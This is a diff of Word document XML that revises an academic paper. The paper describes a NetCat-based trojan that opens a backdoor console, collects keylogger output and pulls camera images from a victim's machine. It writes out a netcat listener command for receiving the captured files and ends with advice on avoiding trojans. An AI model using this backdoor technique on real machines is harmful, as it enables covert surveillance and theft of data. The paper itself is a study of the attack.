+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> software to ensure its security. Another is to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>avoid connecting to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>unsecured</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> public networks as much as possible</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Some of these</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> public networks</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> are</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> those provided by places like coffee shops and shopping malls as they may also have unsuspecting individuals who are very much capable of using software </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>similar to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> what was demonstrated in this study to steal valuable information and cause harm.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -499,83 +1031,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">In modern times, there are several ways that can employed to avoid being infected with a trojan horse virus. The first would be </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>never download or operate programs from an untrusted or unverified source.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> The fact that modern revisions of the operating systems that run most of the hardware to date are updated to protect themselves against various kinds of infections, they can never be safe. Therefore, one should not be eager to install applications from an unknown source. But, should insect them with antivirus software to ensure its security. Another is to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>avoid connecting to public networks as much as possible</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">as public networks such as those provided by places like coffee shops and shopping malls as they may also have unsuspecting individuals who are very much capable of using software </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>like</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> what was demonstrated in this study to steal valuable information and cause harm.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
         <w:t>_____________________________________________________________________________________</w:t>
       </w:r>
@@ -792,15 +1247,7 @@
           <w:bCs/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> for addressing different functions at the source and destination of the said datagram.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> This protocol does not have any kind of encryption. Thus, exposing the user’s program and data to any unreliability and </w:t>
+        <w:t xml:space="preserve"> for addressing </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -809,15 +1256,39 @@
           <w:sz w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">vulnerability of the underlying network. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">There is no kind of ordering, checking against data duplication </w:t>
+        <w:t>different functions at the source and destination of the said datagram.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> This protocol does not have any kind of encryption. Thus, exposing the user’s program and data to any unreliability and vulnerability of the underlying network. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>There is no kind of ordering, checking against data duplication</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -925,7 +1396,25 @@
           <w:i/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>command-line interface.</w:t>
+        <w:t>command-line interface</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (CLI)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1010,7 +1499,34 @@
           <w:i/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>netcat</w:t>
+        <w:t>Ne</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>at</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1071,7 +1587,23 @@
           <w:bCs/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">. Netcat is a multiplatform application is a small network utility that manages input and output of data in varying file types. [7] without writing to the filesystem of the host. </w:t>
+        <w:t>. Netcat is a multiplatform application</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>. It</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is a small network utility that manages input and output of data in varying file types [7] without writing to the filesystem of the host. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1097,16 +1629,6 @@
         </w:rPr>
         <w:t>It would also be quite important to note that as NetCat opens a port for listening to commands on the host machine, there is an increased probability of a threat or security risk.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1327,7 +1849,7 @@
                                 <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B8BDFC" wp14:editId="73821085">
                                   <wp:extent cx="5252085" cy="2748915"/>
                                   <wp:effectExtent l="0" t="0" r="5715" b="0"/>
-                                  <wp:docPr id="42" name="Picture 42"/>
+                                  <wp:docPr id="2" name="Picture 2"/>
                                   <wp:cNvGraphicFramePr>
                                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                                   </wp:cNvGraphicFramePr>
@@ -1427,7 +1949,7 @@
                           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B8BDFC" wp14:editId="73821085">
                             <wp:extent cx="5252085" cy="2748915"/>
                             <wp:effectExtent l="0" t="0" r="5715" b="0"/>
-                            <wp:docPr id="42" name="Picture 42"/>
+                            <wp:docPr id="2" name="Picture 2"/>
                             <wp:cNvGraphicFramePr>
                               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                             </wp:cNvGraphicFramePr>
@@ -1575,7 +2097,7 @@
                                 <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A517E9" wp14:editId="53AE60AF">
                                   <wp:extent cx="5715000" cy="3013710"/>
                                   <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                                  <wp:docPr id="43" name="Picture 43"/>
+                                  <wp:docPr id="4" name="Picture 4"/>
                                   <wp:cNvGraphicFramePr>
                                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                                   </wp:cNvGraphicFramePr>
@@ -1699,7 +2221,7 @@
                           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A517E9" wp14:editId="53AE60AF">
                             <wp:extent cx="5715000" cy="3013710"/>
                             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                            <wp:docPr id="43" name="Picture 43"/>
+                            <wp:docPr id="4" name="Picture 4"/>
                             <wp:cNvGraphicFramePr>
                               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                             </wp:cNvGraphicFramePr>
@@ -1802,7 +2324,21 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">The image show in figure 1 depicts the program that serves as the bridge between the victim and the attacker. Here, the program executes </w:t>
+        <w:t xml:space="preserve">The image show in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">igure 1 depicts the program that serves as the bridge between the victim and the attacker. Here, the program executes </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1840,15 +2376,51 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">which basically creates a netcat </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>server</w:t>
+        <w:t xml:space="preserve">which basically creates a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>erver</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1872,7 +2444,35 @@
           <w:sz w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">The image shown in figure 2 depicts the command line window interface shown to the user in the attacker’s end of the line. Here, the attacker is shown what options he can execute while the ncat server is up and running on the victim’s machine. It would be quite important to note that if the attacker desires to obtain files from the remote machine he would have to launch a backdoor console using the </w:t>
+        <w:t xml:space="preserve">The image shown in figure 2 depicts the command line window interface shown to the user in the attacker’s end of the line. Here, the attacker is shown what options he can execute while the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>NetC</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>at server is up and running on the victim’s machine. It would be quite important to note that if the attacker desires to obtain files from the remote machine</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> he would have to launch a backdoor console using the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2234,7 +2834,31 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">which, in turn, would initialize a netcat </w:t>
+        <w:t xml:space="preserve">which, in turn, would initialize a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2254,7 +2878,21 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
         </w:rPr>
-        <w:t xml:space="preserve">portable network graphic. </w:t>
+        <w:t>portable network graphic</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (.png file extension)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2720,7 +3358,31 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">Figure 4 shows how the attacker can retrieve the text file containing the data logged by the key logger that comes along with the netcat sever. </w:t>
+        <w:t xml:space="preserve">Figure 4 shows how the attacker can retrieve the text file containing the data logged by the key logger that comes along with the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at sever. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2759,7 +3421,31 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t xml:space="preserve">to netcat. This, in turn, would initialize a listener that would wait and accept connections that are transmitting a text file. This command would also create a local </w:t>
+        <w:t xml:space="preserve">to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">at. This, in turn, would initialize a listener that would wait and accept connections that are transmitting a text file. This command would also create a local </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3166,7 +3852,104 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>igure 5 shows how the attacker can retrieve images taken with the remote machine’s built-in camera. Entering the -m command would initialize a netcat listener that accepts connections that are sending files of type bitmap (bmp). This command relays nc -v -l -p 1997 &gt; camera_capture.bmp to nectat which in turn creates a local bitmap file that would act as a container for the image file to be retrieved from the remote host.</w:t>
+        <w:t>igure 5 shows how the attacker can retrieve images taken with the remote machine’s built-in camera</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> if it is installed and working</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Entering the -m command would initialize a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>et</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>at listener that accepts connections that are sending files of type bitmap (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>bmp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file extension</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). This command relays </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
